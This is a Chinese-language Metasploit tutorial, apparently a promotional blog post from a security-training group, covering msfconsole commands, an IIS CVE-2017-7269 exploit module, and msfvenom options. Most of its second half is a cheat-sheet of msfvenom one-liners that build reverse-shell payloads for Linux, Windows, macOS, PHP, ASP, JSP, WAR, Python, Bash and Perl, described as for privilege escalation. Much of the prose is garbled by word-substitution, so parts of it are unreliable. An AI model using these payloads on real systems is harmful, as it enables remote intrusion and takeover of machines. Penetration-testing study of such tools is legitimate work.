kali是默认集成了mepasploit framework,简称为msf,不同的框架下,它有不同的模块,不同的模块之间,互相交流彼此生产输入输出的数据,第一个模块天生的数据可以给第二个或者第三个模块去直接拿来利用,缘故原由是它拿来利用的是后台有数据库,其它的版本后面也有数据库,比如说我们扫描的目标系统,扫描下来的信息,比如说开放了哪些端口,哪些信息,都会存到数据库里面,而measploit framework用的是postgresql数据库来进行存储。
早期的msf版本须要先启动数据库再启动msf
2)msf的基本机构
3)、msf的根本操作和命令
在这里的话,我们打开kali的终端,输入msfconsole打开msf的界面,由于kali系统是自带的msf工具,实行命令之后,它这里会进行一个初始化,接着就可以瞥见msf的命令行界面
4)msf中专业术语,由于在msf中,这些都是常见的专业术语,也是必要的
– Exploit,攻击工具/代码
– Payload,攻击载荷
– Shellcode
– Module,模块
– Listener,监听器
5)、常用命令showpayloads (show 可以理解为显示的意思), 查看所有可用的渗透攻击程序代码show auxiliary – 查看所有可用的赞助攻击工具,然后就可以瞥见显示出相对应的赞助工具Use exploist/windows/iis/cve_2017_7269 进入相对应的模块,比如说我进入了cve_2017_7269漏洞模块,接着就可以瞥见它这里进入了show options – 查看该模块所有可用选项,比如说我们进入cve_2017_7269漏洞模块,实行攻击的话,须要配置该模块的一些选项 show payloads – 查看该模块适用的所有载荷代码,然后就可以显示出相对应的payload show targets – 查看该模块适用的攻击目标类型 search ssh - 根据关键字搜索某模块,比如说我搜索ssh相对应的漏洞模块,就可以瞥见显示出相对应的ssh关键词的模块 info – 显示某模块的详细信息 bach –退出当提高行的模块 6)msfvenom (攻击载荷天生和编码器)紧张参数:-p payload-e 编码办法-i 编码次数-b 在天生的程序中避免涌现的值LHOST,LPORT 监听上线的主机IP和端口-f exe 天生EXE格式利用msfvenom -l 可以查看可以利用payloadmsfvenom -l | grep windows | grep x64 | grep tcp 选择payload 7)、在Linux命令下,实行msf命令天生可实行的文件,这些文件用来反弹shell用于提权,各种可实行的脚本命令如下。Linux:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elfWindows:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exeMac:msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoPHP:msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.phpcat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.phpASP:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.aspJSP:msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jspWAR:msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.warPython:msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pyBash:msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.shPerl:msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
末了喜好我文章的朋友请加圈子关注我们,私信关键词:学习。(送免费资料和优惠券)
就会自动分享给你微旗子暗记。欢迎大家加入我们的安全大家庭。提高大家的安全意识,提升大家的网络安全技能一贯是我们的初衷和愿景,让我们共同成为守护信息天下的"SaFeMAN"。
还有可以关注我们微信"大众年夜众号,在"大众年夜众号上输入安界网,就可以关注到我们,领取资料和优惠券